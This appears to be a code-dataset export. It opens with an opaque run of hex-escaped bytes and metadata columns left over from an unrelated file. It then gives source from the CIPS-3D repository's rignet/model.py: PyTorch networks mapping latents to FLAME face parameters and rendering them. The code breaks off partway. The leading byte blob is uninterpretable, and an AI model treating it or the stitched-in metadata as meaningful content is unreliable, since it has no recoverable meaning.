a8\xff\x2b\xb1\x89\x14\x81\xbc\x21\x91\x60\xb2\x94\x66\xee\x2d\x4b\x81\x34\x36\xb4\x7f\x36\x4f\x12\xbc\x5a\x23\xd5\x5b\x56\xb6\x2e\x77\x1b\xfc\x20\x1e\x36\x83\xd1\xbe\x83\xc2\x29\x82\x2c\x6b\x01\x5c\x9b\x7b\x4b\x40\xab\x5e\xb0\x8d\x14\xa9\xf9\x06\x6b\x2d\x75\x61\x3d\x11\x5c\xb9\x5f\x88\x3b\x15\xfd\xc5\x02\xb9\x30\x9c\x17\x75\x83\xc0\xa6\xc0\x3b\x5e\xe0\x4e\xc6\xbc\x9a\xca\xb0\x87\x00\x28\xbe\xcc\x25\x2e\x18\x16\x2e\xd7\x35\x1e\xa6\xdb\xbd\xce\xef\x83\x65\xf4\xd4\x08\xea\x17\x29\x6a\x4b\xf9\xfe\xc4\xc9\x51\xf5\x35\xaa\xf1\x9d\x9c\x35\x7a\x50\x48\x27\xf1\xd2\x58\x18\x25\xe4\xad\x20\x46\x4e\x55\x77\x02\x6e\x20\x2f\x96\x56\x61\xc7\xdb\xa5\x98\xdf\xe5\xca\x61\xfd\xc4\xb1\xf4\x1e\x0f\xb5\xa5\x0f\x7c\xbc\x33\x10\x98\xab\xe8\x0f\x22\x57\x3b\xf0\x3e\xf7\x12\x30\x81\xe5\x82\x3c\xb1\x45\x03\x5d\x0d\xb1\xcd\xf7\x42\x7d\x6b\x41\x62\x15\x2d\x0a\xaf\x5e\x0a\xbc\x99\x65\x8a\xdd\x1b\x1a\xd7\x2c\xe4\xc5\x2c\xf8\x83\x47\xfe\xc4\xe3\xbe\x93\x19\x82\x66\xe4\x15\x4f\xe5\x77\xf3\xa1\x63\xa9\xa9\xb5\x53\xf0\x11\x11\x79\x9a\x3c\x36\x5a\xd3\x06\x16\x35\xb0\x59\x78\xa0\x97\xe4\xc4\xae\x35\x28\xe1\xc7\xdb\x15\xbe\xed\xe7\xe6\x75\xb4\xb6\x63\x9f\x24\xbf\x4f\xc5\xb3\x5a\x2f\x5c\x73\x8b\x94\xb4\x39\xd0\xd6\x10\x84\x1a\x8c\x0e\xdc\x3e\x6e\xc7\x29\xc4\xad\xef\xec\x8e\x31\x14\x8c\x9a\x9b\xe6\xd5\x45\xe3\xda\xf4\x5e\x1c\x4b\x69\x81\xa6\xb1\xca\x5d\x1f\x64\x90\x1e\x2e\xa9\x9f\xa8\xc0\x03\xcd\x0b\x06\xd4\xe9\xee\x61\x56\x93\x6a\xcb\xa2\x25\x46\xf6\x4a\x52\x9e\xe2\xd0\xf2\x97\xa5\x41\x62\xd5\x6c\xc0\x06\xb8\xbd\xbf\x15\x5f\xe4\x38\x31\x22\x74\xd1\xaf\x29\xac\xbd\xb7\x53\x4f\x42\x45\xfd\xf5\x27\xce\xdd\x5d\x8d\x60\x85\x4d\x1f\x99\x24\x1e\x83\x1a\x36\xfd\xa3\x6a\x1a\x87\xf8\x0e\x14\xaf\xe6\xfb\x85\xb1\x7b\xfd\x4c\x6f\x89\xdc\x8c\xd2\x66\x39\xfa\x4e\xd3\xac\x9e\xb3\x50\x8c\x1e\xd7\xf5\x00\x38\xeb\xf3\x9b\xcc\xa5\xf0\x85\x66\x33\x79\x03\x81\xcb\xc7\x39\xae\x70\xd2\x5e\x37\x7f\xc8\xba\x8f\x73\x8f\xf2\x2d\xee\x63\x48\x06\xe8\x3d\x9c\x8a\x19\x1d\x11\xf1\x5f\x62\x13\x05\x06\x5a\x14\x19\x99\x4b\x76\x8a\x11\x95\x2f\xd2\xba\x83\xc2\x6c\x4d\x86\x7d\x09\x57\x2c\x75\xf8\xc4\x16\x5d\x0f\xd5\x6c\x07\xd3\x85\x58\xc5\x29\xbc\x13\xfa\x72\x23\x99\x29\x07\x6b\x8e\x57\x1d\x69\x0a\x72\xa0\x10\x81\x50\xb3\x58\xde\x84\x4b\xf0\xdf\xeb\x08\x68\x4d\x93\x92\xa2\x12\x49\xd7\xec\x67\x30\x5d\xca\x6c\xbe\xba\xc6\x70\x87\x5c\x48\xd1\x65\xab\x0e\x96\x44\x02\x60\xe1\x36\x52\x6a\x4d\xbf\xe0\xe1\x9a\x78\xca\xe7\x12\x2b\xa0\xdd\xbc\xf1\x65\x29\x4e\xbd\x9e\x45\xd1\x32\x40\x32\xd8\x56\xdf\xdf\x99\x73\x5d\xa1\x6d\x0c\x26\x2c\xa2\x27\x5c\x10\x97\x7b\xf9\xea\x69\x6a\x1c\x56\xee\xf3\x28\xdc\x69\x9d\x17\xf3\xed\x7a\x9e\x97\x85\xb4\x9d\xfa\x24\xa4\x82\x3e\xcd\xc8\x6e\x21\x42\x15\xb2\xe5\x4d\x0d\xb9\x1c\x1b\x66\x0d\x99\x7b\x0e\x2e\x9c\xe3\xae\xcb\x06\xb5\xe0\xa0\x47\xbe\x4a\x22\xea\x90\xd6\x81\x1c\xab\xe4\xf2\x83\xe5\x20\x05\x23\x85\xd2\xf8\x6c\xbc\xd5\x19\x0c\x60\xc9\xc2\x33\xe5\x36\xca\x75\x32\x7c\x85\x4e\xf8\xaf\xa1\x09\x71\x13\x3f\x62\x76\xcc\xb0\x29\xa1\x47\x01\xe4\x05\xb8\x25\x34\xd0\xb1\x80\x34\xdb\xa2\xf6\xff\x0b\x5a\x72\xec\xe7\x9a\xb9\xd7\x11\xbb\x27\x2e\xe9\xe6\xfd\x83\xba\xb8\x16\x26\x74\xe3\x7f\xb8\x3c\x81\x4f\xa9\xa9\x73\x9f\xe4\x06\x2e\x13\xce\xc2\xd0\x99\x45\xf5\xda\x1e\xe5\xe0\xdf\xe8\x70\x2e\xb5\x0e\xfa\xbc\xab\x32\x17\x3e\xe7\xb7\xd6\x64\xa1\x63\x81\x0f\x96\x43\x8b\x54\x86\x94\x61\x4f\x27\x51\x0a\xfe\xf9\x20\x8a\xe7\xe8\x99\x3c\x3d\x84\x6a\x95\x12\xbb\xcd\x1a\xd7\x25\x7a\xb2\x74\x8a\x82\x87\xc8\xa3\x7d\x19\xb4\x05\x46\x54\xe0\xd2\x0f\x47\x55\x10\x2c\xc8\x75\x72\x92\x7f\x68\xd9\x34\xf4\xea\x3f\xa4\xf2\x19\x7b\x10\x9c\x2a\x68\x25\x9c\xc8\x9c\x8d\xf8\xba\xcf\x35\xd1\x5f\x1b\xeb\x50\x82\x89\xf1\x4a\xec\xf4\x60\x0a\x48\x53\x58\x07\x90\x22\x95\x0c\x02\x29\x2a\xab\x78\x2b\x20\xb7\x68\x23\x53\xf6\xc3\x8b\x8d\x7c\x10\xf6\x76\x8a\x5b\x5d\x50\x82\x7c\x92\x21\xb7\x42\x56\xcc\x77\x55\x84\xc1\x27\x59\xdc\xa6\xe1\x9e\x2c\xd3\x12\x0e\xe6\xe2\xc0\x50\x23\x94\x9f\xb3\x4e\x5e\xf7\xe4\xa4\x85\x0d\x69\x1a\xbb\x97\x21\x6d\xf4\x9b\xfc\xc6\xb4\x1e\xd0\xba\x12\x4b\x0d\xec\xfe\x17\xc3\x56\x70\x0b\xee\x4e\x08\x41\x70\xba\x61\xe7\x0e\xe8\x3d\xda\xb0\xdf\xd6\x31\x13\xb4\x41\xf3\xf4\x2b\x62\x2a\x19\x1a\xc7\xbb\xea\xf0\x2a\x0b\xde\xbf\xf4\xe3\x36\x85\xd8\xf5\x86\x80\x07\x13\x07\x37\x2b\x9d\xcb\x72\x50\xef\x42\x5f\xe3\x57\x71\x7e\xd0\xd8\xd4\x4c\x12\x6b\x4c\xac\x09\xf1\x90\x83\x00\x9e\x3e\x1a\xb4\x6c\xe3\x60\x74\x6f\xd3\xc6\xd5\x3c\x7f\xf9\x21\x6a\x03\xd7\x7a\x0b\x9a\x54\xa1\x03\xce\xf5\x21\xa7\x43\x17\x02\x76\x56\x54\x98\xc7\x7f\x7b\x9f\x63\x93\x6b\xdf\x9d\x5f\x49\x23\x3d\x48\x56\x3e\x7e\x4b\x6d\x5e\xa4\xfc\x7e\x64\x98\xb1\x74\x4c\x50\x3d\x91\x30\xbb\xf1\x36\x7a\x30\xf0\x42\x1a\x23\x42\x61\xec\xf6\x33\x16\x1f\xe5\x96\x44\x68\x2a\xb3\xce\x27\x4e\xd5\xaa\x9d\x94\xfc\x8f\x65\x00\x1a\x53\xc8\xb2\x04\x6f\x5c\xd7\x7c\x14\x7f\x45\xdd\xa2\xe5\xa1\x19\xb8\x8b\xd0\x41\x6b\xef\xad\x09\xc1\x2e\x3b\x6f\x8e\x35\xf5\x84\x9b\xaa\x3f\x06\x44\x19\x65\x8f\x8a\x9a\x74\x5e\x2d\x29\x72\x3f\xf5\x2f\x18\x6b\x2e\xc0\xc8\x60\x68\xe4\x7e\x0a\x1c\x52\x3c\xa9\x07\x94\x45\x51\x4c\x4a\x8e\xc9\x41\x5f\x4e\x2c\xe6\x31\xed\x28\xc5\x03\xcc\xa4\x31\x14\x89\xed\x45\x9c\x80\x08\x75\xdd\x04\x8c\xd1\xd0\x2a\xb4\xe5\xb4\x65\xfd\xc7\x0f\xa0\xce\x26\xcf\x47\x0d\xf5\x0b\x68\xeb\xc2\xde\xd5\x81\x26\x04\x3e\xa9\x9b\x68\x49\x6b\x86\xaf\x35\x35\xcf\x2f\xae\x31\x5c\x5c\xd3\x39\x15\x65\x47\x3b\xf3\x4f\x97\x7a\xaa\x81\x2e\x87\xb0\x3c\x91\x04\x95\xab\x78\x5f\xbe\x87\x43\xf4\x8e\xe6\x4c\x1a\xc8\x9e\xc1\x6b\x70\xb8\x4f\x07\xee\xfc\xdd\x27\xf8\x67\x34\x24\x1d\xf7\x35\xbc\xf4\x77\xd8\x83\xe0\x64\xb9\xff\xf2\x46\x77\x4c\x14\x41\xd7\x48\x2b\xc5\x6c\x3d\x07\x41\xb4\xb5\xb8\xe2\x8d\xfc\xa6\xc7\x50\x53\x94\x4f\x6c\x10\xbc\xb8\x39\x47\xe0\x31\x85\xc1\xeb\xcc\x59\x3c\x48\xdd\x4b\xa2\x8f\xa8\x2a\x1f\x5a\x5d\xfc\x93\x4e\x7f\x97\x76\x35\xad\x28\x55\x61\xfc\x5b\xef\x6a\xbc\xbc\x5b\x6d\x2f\x1e\xd4\x98\x0a\xed\xf2\x34\xc0\x66\x63\xf0\xfd\x38\x27\x02\xc5\x4b\xcc\x02\xa7\x52\x2f\xd6\xff\xa4\xc0\x60\xca\x94\x38\x14\xfb\x65\x56\xc3\xfb\xde\x93\x6a\xd8\xbe\x98\x6d\x15\xfd\x0b\xfd\xf0\xb5\xed\x9f\xa7\x75\x2f\xaf\x5e\xb7\x9b\x2d\xc2\x97\xd6\x59\x78\xed\xd4\xb0\xf2\xc2\x24\x3b\xd9\x10\xd1\xbb\xb3\x5e\xbc\xe3\x75\x10\x25\x82\x97\x5b\xce\x5f\xd4\x29\xc2\xb5\xc4\xdb\xd4\x9f\x40\x08\x38\x5e\x2b\x19\x4d\x50\x25\x7a\xf5\x01\x04\xad\x53\x79\x4e\x48\xf6\xb1\xae\xd1\x49\xf1\x4c\x4e\x10\x9d\x1c\xe6\x4a\x53\xac\x7c\x0e\x17\xfe\xf3\x49\xda\xcf\xe1\xce\x24\xc1\x1b\x2f\x3a\xca\xc6\x03\xe2\x71\x90\x70\x1b\x82\x95\x69\x22\x58\xe0\xd6\xb8\xf8\xe9\x1c\x08\x2d\x8b\x72\x5d\x2e\xf5\xff\xc1\xe7\x34\xce\x8f\xe2\xa5\xc1\x40\x52\xca\x84\x0e\x90\xfd\xcc\xdc\x45\x3e\xc2\x01\x5b\xd2\xf8\x3d\x5f\xf4\x46\x9d\x45\xb6\x1b\xae\x11\xfc\x2c\x13\x09\xc0\x6a\x1a\xaf\x04\xe2\x43\xe5\x5e\x91\x96\xb4\x6b\x35\x9c\x51\xfa\xd7\x8c\x8e\x83\xc0\x5b\x5b\x7d\x15\xff\xef\xa6\x4c\x6d\xf2\x72\x01\x9a\x31\x12\x33\x9e\xb5\xba\xe2\x78\x6f\x6f\x44\x1c\x89\x51\xf3\xf0\x23\x7e\x35\x69\xd1\x30\x97', 2) | 14,035 | 14,035 | 0.749982 | 3,504 | 14,035 | 3.000571 | 0.074486 | 0.010843 | 0.011128 | 0.009131 | 0.003709 | 0.002283 | 0.002283 | 0 | 0 | 0 | 0 | 0.31364 | 0.000214 | 14,035 | 1 | 14,035 | 14,035 | 0.435647 | 0 | 0 | 0 | 0 | 1 | 0.99715 | 0.99715 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
56bc15a8493c3e2504ffc0189f52c8af7470eb38 | 38,004 | py | Python | rignet/model.py | lelechen63/CIPS-3D | 49e34ecab7410ac357a3d467e347cd39ee442bd5 | [
"MIT"
] | 1 | 2022-03-20T08:10:29.000Z | 2022-03-20T08:10:29.000Z | rignet/model.py | lelechen63/CIPS-3D | 49e34ecab7410ac357a3d467e347cd39ee442bd5 | [
"MIT"
] | 1 | 2022-03-21T04:54:10.000Z | 2022-03-21T04:54:10.000Z | rignet/model.py | lelechen63/CIPS-3D | 49e34ecab7410ac357a3d467e347cd39ee442bd5 | [
"MIT"
] | 1 | 2022-02-25T01:28:10.000Z | 2022-02-25T01:28:10.000Z | import numpy as np
import torch.nn.functional as F
import pytorch_lightning as pl
import torch as th
import torch.nn as nn
import functools
import torchvision
from collections import OrderedDict
import os
from os import path as osp
import numpy as np
import pickle
from PIL import Image
import cv2
import sys
sys.path.append('./photometric_optimization/')
from renderer import Renderer
import util
from models.FLAME import FLAME, FLAMETex
sys.path.append('/home/uss00022/lelechen/github/CIPS-3D/utils')
from visualizer import Visualizer
import tensor_util
from blocks import *
import face_alignment
class Latent2Code(nn.Module):
def __init__(self, flame_config, opt ):
super().__init__()
self.opt = opt
# self.save_hyperparameters()
self.flame_config = flame_config
self.image_size = self.flame_config.image_size
# networks
self.nerf_latent_dim = 256
self.gan_latent_dim = 512
self.shape_dim = 100
self.exp_dim = 50
self.albedo_dim = 50
self.lit_dim = 27
self.Latent2ShapeExpCode = self.build_Latent2ShapeExpCodeFea( weight = '' if opt.isTrain else opt.Latent2ShapeExpCode_weight)
self.latent2shape = self.build_latent2shape( weight = '' if opt.isTrain else opt.latent2shape_weight)
self.latent2exp = self.build_latent2exp(weight = '' if opt.isTrain else opt.latent2exp_weight)
self.Latent2AlbedoLitCode = self.build_Latent2AlbedoLitCodeFea(weight = '' if opt.isTrain else opt.Latent2AlbedoLitCode_weight)
self.latent2albedo = self.build_latent2albedo(weight = '' if opt.isTrain else opt.latent2albedo_weight)
self.latent2lit = self.build_latent2lit(weight = '' if opt.isTrain else opt.latent2lit_weight)
if opt.isTrain:
self._initialize_weights()
self.flame = FLAME(self.flame_config).to('cuda')
self.flametex = FLAMETex(self.flame_config).to('cuda')
self._setup_renderer()
self.ckpt_path = os.path.join(opt.checkpoints_dir, opt.name)
os.makedirs(self.ckpt_path, exist_ok = True)
def build_Latent2ShapeExpCodeFea(self, weight = ''):
Latent2ShapeExpCode = th.nn.Sequential(
LinearWN( self.nerf_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for latent2ShapeExpCode feature extraction network')
Latent2ShapeExpCode.load_state_dict(torch.load(weight))
return Latent2ShapeExpCode
def build_latent2shape(self, weight = ''):
latent2shape= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.shape_dim )
)
if len(weight) > 0:
print ('loading weights for latent2Shape network')
latent2shape.load_state_dict(torch.load(weight))
return latent2shape
def build_latent2exp(self, weight = ''):
latent2exp= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.exp_dim )
)
if len(weight) > 0:
print ('loading weights for latent2exp network')
latent2exp.load_state_dict(torch.load(weight))
return latent2exp
def build_Latent2AlbedoLitCodeFea(self, weight = ''):
Latent2AlbedoLitCode = th.nn.Sequential(
LinearWN( self.gan_latent_dim , 512 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 512, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for Latent2AlbedoLitCode feature extraction network')
Latent2AlbedoLitCode.load_state_dict(torch.load(weight))
return Latent2AlbedoLitCode
def build_latent2albedo(self, weight = ''):
latent2albedo= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.albedo_dim )
)
if len(weight) > 0:
print ('loading weights for latent2albedo feature extraction network')
latent2albedo.load_state_dict(torch.load(weight))
return latent2albedo
def build_latent2lit(self, weight = ''):
latent2lit= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.lit_dim )
)
if len(weight) > 0:
print ('loading weights for latent2lit feature extraction network')
latent2lit.load_state_dict(torch.load(weight))
return latent2lit
def _setup_renderer(self):
mesh_file = '/home/uss00022/lelechen/basic/flame_data/data/head_template_mesh.obj'
self.render = Renderer(self.image_size, obj_filename=mesh_file).to('cuda')
def forward(self, shape_latent, appearance_latent, cam, pose, flameshape = None, flameexp= None, flametex= None, flamelit= None ):
shape_fea = self.Latent2ShapeExpCode(shape_latent)
shapecode = self.latent2shape(shape_fea)
expcode = self.latent2exp(shape_fea)
app_fea = self.Latent2AlbedoLitCode(appearance_latent)
albedocode = self.latent2albedo(app_fea)
litcode = self.latent2lit(app_fea)
return_list = {}
if self.opt.supervision =='render' or flameshape != None:
vertices, landmarks2d, landmarks3d = self.flame(shape_params=shapecode, expression_params=expcode, pose_params=pose)
trans_vertices = util.batch_orth_proj(vertices, cam)
trans_vertices[..., 1:] = - trans_vertices[..., 1:]
## render
albedos = self.flametex(albedocode, self.image_size) / 255.
ops = self.render(vertices, trans_vertices, albedos, litcode.view(shape_latent.shape[0], 9,3))
predicted_images = ops['images']
return_list['landmarks3d'] = landmarks3d
return_list['predicted_images'] = predicted_images
else:
return_list['expcode'] = expcode
return_list['shapecode'] = shapecode
return_list['litcode'] = litcode
return_list['albedocode'] = albedocode
if flameshape != None:
flamelit = flamelit.view(-1, 9,3)
recons_vertices, _, recons_landmarks3d = self.flame(shape_params=flameshape, expression_params=flameexp, pose_params=pose)
recons_trans_vertices = util.batch_orth_proj(recons_vertices, cam)
recons_trans_vertices[..., 1:] = - recons_trans_vertices[..., 1:]
## render
recons_albedos = self.flametex(flametex, self.image_size) / 255.
recons_ops = self.render(recons_vertices, recons_trans_vertices, recons_albedos, flamelit)
recons_images = recons_ops['images']
return_list['recons_images'] = recons_images
return return_list
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
class Latent2Code2(nn.Module):
def __init__(self, flame_config, opt ):
super().__init__()
self.opt = opt
# self.save_hyperparameters()
self.flame_config = flame_config
self.image_size = self.flame_config.image_size
# networks
self.nerf_latent_dim = 256
self.gan_latent_dim = 512
self.shape_dim = 100
self.exp_dim = 50
self.albedo_dim = 50
self.lit_dim = 27
self.Latent2fea = self.build_Latent2CodeFea( weight = '' if opt.isTrain else opt.Latent2ShapeExpCode_weight)
self.latent2shape = self.build_latent2shape( weight = '' if opt.isTrain else opt.latent2shape_weight)
self.latent2exp = self.build_latent2exp(weight = '' if opt.isTrain else opt.latent2exp_weight)
self.latent2albedo = self.build_latent2albedo(weight = '' if opt.isTrain else opt.latent2albedo_weight)
self.latent2lit = self.build_latent2lit(weight = '' if opt.isTrain else opt.latent2lit_weight)
if opt.isTrain:
self._initialize_weights()
self.flame = FLAME(self.flame_config).to('cuda')
self.flametex = FLAMETex(self.flame_config).to('cuda')
self._setup_renderer()
self.ckpt_path = os.path.join(opt.checkpoints_dir, opt.name)
os.makedirs(self.ckpt_path, exist_ok = True)
def build_Latent2CodeFea(self, weight = ''):
Latent2ShapeExpCode = th.nn.Sequential(
LinearWN( self.nerf_latent_dim + self.gan_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for latent2ShapeExpCode feature extraction network')
Latent2ShapeExpCode.load_state_dict(torch.load(weight))
return Latent2ShapeExpCode
def build_latent2shape(self, weight = ''):
latent2shape= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.shape_dim )
)
if len(weight) > 0:
print ('loading weights for latent2Shape network')
latent2shape.load_state_dict(torch.load(weight))
return latent2shape
def build_latent2exp(self, weight = ''):
latent2exp= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.exp_dim )
)
if len(weight) > 0:
print ('loading weights for latent2exp network')
latent2exp.load_state_dict(torch.load(weight))
return latent2exp
def build_latent2albedo(self, weight = ''):
latent2albedo= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.albedo_dim )
)
if len(weight) > 0:
print ('loading weights for latent2albedo feature extraction network')
latent2albedo.load_state_dict(torch.load(weight))
return latent2albedo
def build_latent2lit(self, weight = ''):
latent2lit= th.nn.Sequential(
LinearWN( 256 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.lit_dim )
)
if len(weight) > 0:
print ('loading weights for latent2lit feature extraction network')
latent2lit.load_state_dict(torch.load(weight))
return latent2lit
def _setup_renderer(self):
mesh_file = '/home/uss00022/lelechen/basic/flame_data/data/head_template_mesh.obj'
self.render = Renderer(self.image_size, obj_filename=mesh_file).to('cuda')
def forward(self, shape_latent, appearance_latent, cam, pose, flameshape = None, flameexp= None, flametex= None, flamelit= None ):
fea = self.Latent2fea( torch.cat([shape_latent, appearance_latent], axis = 1))
shapecode = self.latent2shape(fea)
expcode = self.latent2exp(fea)
albedocode = self.latent2albedo(fea)
litcode = self.latent2lit(fea)
return_list = {}
if self.opt.supervision =='render' or flameshape != None:
vertices, landmarks2d, landmarks3d = self.flame(shape_params=shapecode, expression_params=expcode, pose_params=pose)
trans_vertices = util.batch_orth_proj(vertices, cam)
trans_vertices[..., 1:] = - trans_vertices[..., 1:]
## render
albedos = self.flametex(albedocode, self.image_size) / 255.
ops = self.render(vertices, trans_vertices, albedos, litcode.view(shape_latent.shape[0], 9,3))
predicted_images = ops['images']
return_list['landmarks3d'] = landmarks3d
return_list['predicted_images'] = predicted_images
else:
return_list['expcode'] = expcode
return_list['shapecode'] = shapecode
return_list['litcode'] = litcode
return_list['albedocode'] = albedocode
if flameshape != None:
flamelit = flamelit.view(-1, 9,3)
recons_vertices, _, recons_landmarks3d = self.flame(shape_params=flameshape, expression_params=flameexp, pose_params=pose)
recons_trans_vertices = util.batch_orth_proj(recons_vertices, cam)
recons_trans_vertices[..., 1:] = - recons_trans_vertices[..., 1:]
## render
recons_albedos = self.flametex(flametex, self.image_size) / 255.
recons_ops = self.render(recons_vertices, recons_trans_vertices, recons_albedos, flamelit)
recons_images = recons_ops['images']
return_list['recons_images'] = recons_images
return return_list
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
class RigNerft2(nn.Module):
def __init__(self, flame_config, opt ):
super().__init__()
self.opt = opt
self.nerf_latent_dim = 256
self.gan_latent_dim = 512
self.shape_dim = 100
self.exp_dim = 50
self.albedo_dim = 50
self.lit_dim = 27
self.flame_config = flame_config
self.image_size = self.flame_config.image_size
# funtion F networks
latent2code = Latent2Code(flame_config, opt)
self.Latent2ShapeExpCode, self.latent2shape, \
self.latent2exp, self.Latent2AlbedoLitCode, \
self.latent2albedo, self.latent2lit = self.get_f(latent2code)
# rigNet
# appearance part
self.WGanEncoder = self.build_WGanEncoder(weight = '' if opt.isTrain else opt.WGanEncoder_weight )
self.ShapeEncoder = self.build_ShapeEncoder(weight = '' if opt.isTrain else opt.ShapeEncoder_weight )
self.ExpEncoder = self.build_ExpEncoder(weight = '' if opt.isTrain else opt.ExpEncoder_weight )
self.WGanDecoder = self.build_WGanDecoder(weight = '' if opt.isTrain else opt.WGanDecoder_weight )
# shape part
self.WNerfEncoder = self.build_WNerfEncoder(weight = '' if opt.isTrain else opt.WNerfEncoder_weight )
self.AlbedoEncoder = self.build_AlbedoEncoder(weight = '' if opt.isTrain else opt.AlbedoEncoder_weight )
self.LitEncoder = self.build_LitEncoder(weight = '' if opt.isTrain else opt.LitEncoder_weight )
self.WNerfDecoder = self.build_WNerfDecoder(weight = '' if opt.isTrain else opt.WNerfDecoder_weight )
# Flame
self.flame = FLAME(self.flame_config).to('cuda')
self.flametex = FLAMETex(self.flame_config).to('cuda')
self._setup_renderer()
self.ckpt_path = os.path.join(opt.checkpoints_dir, opt.name)
os.makedirs(self.ckpt_path, exist_ok = True)
def get_f(self,network):
print (network)
print ('loading weights for Latent2ShapeExpCode feature extraction network')
network.Latent2ShapeExpCode.load_state_dict(torch.load(self.opt.Latent2ShapeExpCode_weight))
print ('loading weights for latent2shape feature extraction network')
network.latent2shape.load_state_dict(torch.load(self.opt.latent2shape_weight))
print ('loading weights for latent2exp feature extraction network')
network.latent2exp.load_state_dict(torch.load(self.opt.latent2exp_weight))
print ('loading weights for Latent2AlbedoLitCode feature extraction network')
network.Latent2AlbedoLitCode.load_state_dict(torch.load(self.opt.Latent2AlbedoLitCode_weight))
print ('loading weights for latent2albedo feature extraction network')
network.latent2albedo.load_state_dict(torch.load(self.opt.latent2albedo_weight))
print ('loading weights for latent2albedo feature extraction network')
network.latent2lit.load_state_dict(torch.load(self.opt.latent2lit_weight))
return network.Latent2ShapeExpCode, network.latent2shape, network.latent2exp, \
network.Latent2AlbedoLitCode, network.latent2albedo, network.latent2lit
def latent2params(self, shape_latent, appearance_latent):
shape_fea = self.Latent2ShapeExpCode(shape_latent)
shapecode = self.latent2shape(shape_fea)
expcode = self.latent2exp(shape_fea)
app_fea = self.Latent2AlbedoLitCode(appearance_latent)
albedocode = self.latent2albedo(app_fea)
litcode = self.latent2lit(app_fea).view(shape_latent.shape[0], 9,3)
paramset = [shapecode, expcode, albedocode, litcode]
return paramset
def build_WGanEncoder(self, weight = ''):
WGanEncoder = th.nn.Sequential(
LinearWN( self.gan_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for WGanEncoder network')
WGanEncoder.load_state_dict(torch.load(weight))
return WGanEncoder
def build_ShapeEncoder(self, weight = ''):
ShapeEncoder = th.nn.Sequential(
LinearWN( self.shape_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for ShapeEncoder network')
ShapeEncoder.load_state_dict(torch.load(weight))
return ShapeEncoder
def build_ExpEncoder(self, weight = ''):
ExpEncoder = th.nn.Sequential(
LinearWN( self.exp_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for ExpEncoder network')
ExpEncoder.load_state_dict(torch.load(weight))
return ExpEncoder
def build_WGanDecoder(self, weight = ''):
WGanDecoder = th.nn.Sequential(
LinearWN( 512 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.gan_latent_dim ),
)
if len(weight) > 0:
print ('loading weights for WGanDecoder network')
WGanDecoder.load_state_dict(torch.load(weight))
return WGanDecoder
def build_WNerfEncoder(self, weight = ''):
WNerfEncoder = th.nn.Sequential(
LinearWN( self.nerf_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for WNerfEncoder network')
WNerfEncoder.load_state_dict(torch.load(weight))
return WNerfEncoder
def build_AlbedoEncoder(self, weight = ''):
AlbedoEncoder = th.nn.Sequential(
LinearWN( self.albedo_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for AlbedoEncoder network')
